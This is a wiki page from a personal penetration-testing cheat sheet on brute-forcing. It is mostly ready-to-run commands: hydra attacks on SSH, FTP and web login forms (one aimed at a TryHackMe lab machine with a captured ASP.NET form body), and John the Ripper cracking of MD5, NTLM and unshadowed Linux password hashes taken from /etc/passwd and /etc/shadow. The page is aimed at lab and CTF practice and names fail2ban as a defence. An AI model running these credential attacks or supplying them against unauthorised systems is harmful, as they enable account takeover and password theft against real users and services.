brute forcing - dvanmosselbeen/security-cheat-sheet GitHub Wiki
- Introduction
- Online Brute-Forcing
-
Offline Brute-Forcing
- Hashes
- Linux passwords
- Windows passwords
- Resources
Brute-forcing can be done in different methods, with different tools, depending on the situation and the needs.
Brute-Force online services. With online services, we mean attacking the server in live mode. Feeding him with some passwords until he accepts some password. You probably need to know some username, some user account to start with. If not, go back to the Information Gathering process. Or you can also try to bruteforce the usernames, but this will take longer time.
You need to keep in mind if the service on the server is protected with something like fail2ban. If protected, this bruteforce attack will be detected very soon and the ip of your machines will be banned.
Note: Remove the -vV, to not have so much verbose information. Best only to be done if you know for sure your attack will work.
Brute forcing on 1 know username, so only brute forcing the passwords:
hydra -t 16 -l <USERNAME> -P /usr/share/wordlists/rockyou.txt -vV $IP ssh
Brute forcing with a know list of users, and know list of passwords:
hydra -t 16 -L usernames.txt -P locks.txt -vV $IP ssh
Note: Both, usernames.txt and locks.txt have one entry per line.
This is the same commands as brute forcing an SSH server. We can also easily bruteforce usernames like show in the SSH example.
hydra -t 16 -l <USERNAME> -P /usr/share/wordlists/rockyou.txt -vV $IP ftp
...
For this, you probably first want to make use of Burp Suite tool. To figure out how the username and password are transmitted to the web server. And also to see what error message you get if the credentials aren't accepted. You also need to know a username.
Maybe a good source could be this: https://github.com/dvanmosselbeen/TryHackMe_writeups/tree/main/hydra#post-web-form
hydra -l <USERNAME> -P /usr/share/wordlists/rockyou.txt <IP> http-post-form "/login:username=^USER^&password=^PASS^:Your username or password is incorrect." -V
Another example with cookie. You can try this out in the THM hackpark:
hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.10.249.121 http-post-form "/Account/login.aspx?ReturnURL=/admin:__VIEWSTATE=EOeL86tosog9kLIpjou2A25jQ38AIn6MT%2FrphfVE8xj5okNiXtL1pnEDfnakIBLFROGazrBhvHFpoO%2Bk4DKFvT6UxuAVZ2S7bRhREfGr83PkPyJN14eUyXnu9chWl28QCoa95V3%2Fz09EQumZOdQncH91BV9SxBtovynGlyT9pHQPvcFH&__EVENTVALIDATION=X5U5Dd%2FHvaK8f%2F3CzSs7CxsRjLmmIv5vXbvSJX%2BClLwZbzmMW5QZ%2BBKkVlFiJSfhgWWu0JiZ%2BW%2BX781aAoZewE6yMgFyaQOR5wZCsxY6Sy8eHx0TZqrLyHHRcrOOrbvLI8a5MV43urbnt5IFHYicx3vlBLDU60FfuBba1NYalcz%2FqDWb&ctl00%24MainContent%24LoginUser%24UserName=^USER^&ctl00%24MainContent%24LoginUser%24Password=^PASS^&ctl00%24MainContent%24LoginUser%24LoginButton=Log+in:Login failed" -vv
Note: That ^USER^ and ^PASS^ has been set in this cookie this time.
You can protect services with fail2ban.
Brute-force offline services.
See also my other detailed file documents:
# md5 hash
echo "482c811da5d5b4bc6d497ffa98491e38" > hashfile.txt
# Identify the hash
hashid -j hashfile.txt
# Crack the hash
john --format=<format> --wordlist=/usr/share/wordlists/rockyou.txt hashfile.txt
For example:
john --format=raw-md5 --wordlist=/usr/share/wordlists/rockyou.txt hashfile.txt
First need to unshadow, for this we need the /etc/passwd and the /etc/shadow files.
unshadow local_passwd local_shadow > unshadowed.txt
Then crack the unshadowed file:
john --wordlist=/usr/share/wordlists/rockyou.txt --format=sha512crypt unshadowed.txt
See also the documents:
-
Exploiting writeable etc passwdSee also the documents:
echo 5460C85BD858A11475115D2DD3A82333 > ntlm.txt
hashid -j ntlm.txt
john --format=nt --wordlist=/usr/share/wordlists/rockyou.txt ntlm.txt
See also in metasploit the dumphash.
My other documents: